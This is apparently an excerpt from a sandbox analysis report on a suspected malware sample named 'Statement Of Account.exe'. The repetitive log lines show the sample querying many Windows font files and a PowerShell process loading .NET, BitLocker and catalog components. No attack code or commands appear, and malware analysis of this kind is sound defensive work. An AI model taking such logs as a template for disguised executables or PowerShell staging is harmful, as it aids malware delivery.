Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
